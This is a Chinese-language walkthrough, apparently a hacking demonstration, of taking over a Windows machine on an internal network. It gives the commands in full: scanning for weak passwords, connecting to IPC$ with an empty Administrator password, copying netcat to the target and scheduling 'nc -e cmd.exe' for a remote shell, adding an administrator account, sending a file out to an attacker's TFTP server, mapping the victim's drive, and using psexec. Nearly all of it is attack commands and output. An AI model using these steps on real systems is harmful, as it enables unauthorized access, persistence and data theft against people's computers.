先掃描內部網段(網上掃描軟件很多,我習慣用X-Scan),獲得弱密碼
可以看到現在已經掃描出來許多弱密碼,可以進一步控制
首先和對方建立連接
net use //10.1.12.84/ipc$ "" /user:"Administrator" 命令成功完成。
這是和ip爲10.1.12.84的計算機建立IPC連接
copy nc.exe //10.1.12.84/admin$/system32, nc.exe是一個獲得控制檯木馬的服務器端。
複製一個文件到對方計算機的system32目錄下面
這裏複製的是一個telnet類連接工具。
nc是netcat的簡寫,通常稱爲黑客界的"瑞士軍刀",功能比較強大。
net time //10.1.12.84
查看對方計算機時間,以便利用計劃任務 上午 08:40
at //10.1.12.84 08:42 nc -l -p 5000 -e cmd.exe
新加了一項作業,其作業 ID = 1
添加一個任務,在08:42運行;運行之後將開放一個端口:5000
可以通過這個端口獲得一個shell ,即控制檯
運行之後就可以連接了
nc 10.1.12.84 5000
和對方計算機連接。本地的nc.exe 和對方的nc.exe 建立連接,獲得一個shell.
出現C:/WINDOWS/system32>
現在就成功進入了對方計算機,管理員權限。
現在測試一下能否在對方計算機上執行命令
查看用戶
net user
3個用戶
添加一個用戶試試。
net user testuser testpass /add
命令成功完成
查看用戶
net user
4個用戶
將添加的用戶加入管理員組。
net localgroup administrators testuser /add
命令成功完成
看看剛添加的用戶情況
net user testuser
管理員Administrators組
刪除用戶
net user testuser /del
ipconfig 看它的IP : 10.1.12.84
竊取資料
dir c:/
假設現在要c:/SOUND.LOG
先在本地架設tftp服務器
tftp -i 10.1.16.148 put c:/sound.log
成功傳回
退出。
再測試一下磁盤映射,現在我的電腦的硬盤分區爲C D E F
net use x: //10.1.16.148/c$
查看我的電腦,多了一個x盤。
現在操作對方文件如同操作自己計算機上的文件一樣。
x盤實際上就是對方的c盤
刪除映射
net use x: /del
利用管道工具psexec可以直接在建立IPC連接之後快速地取得控制權
psexec.exe //10.1.12.84 cmd
出現了shell,又進去了!
C:/WINDOWS/system32>
退出!
刪除連接
net use //10.1.12.84/ipc$ /del
演示結束,謝謝 !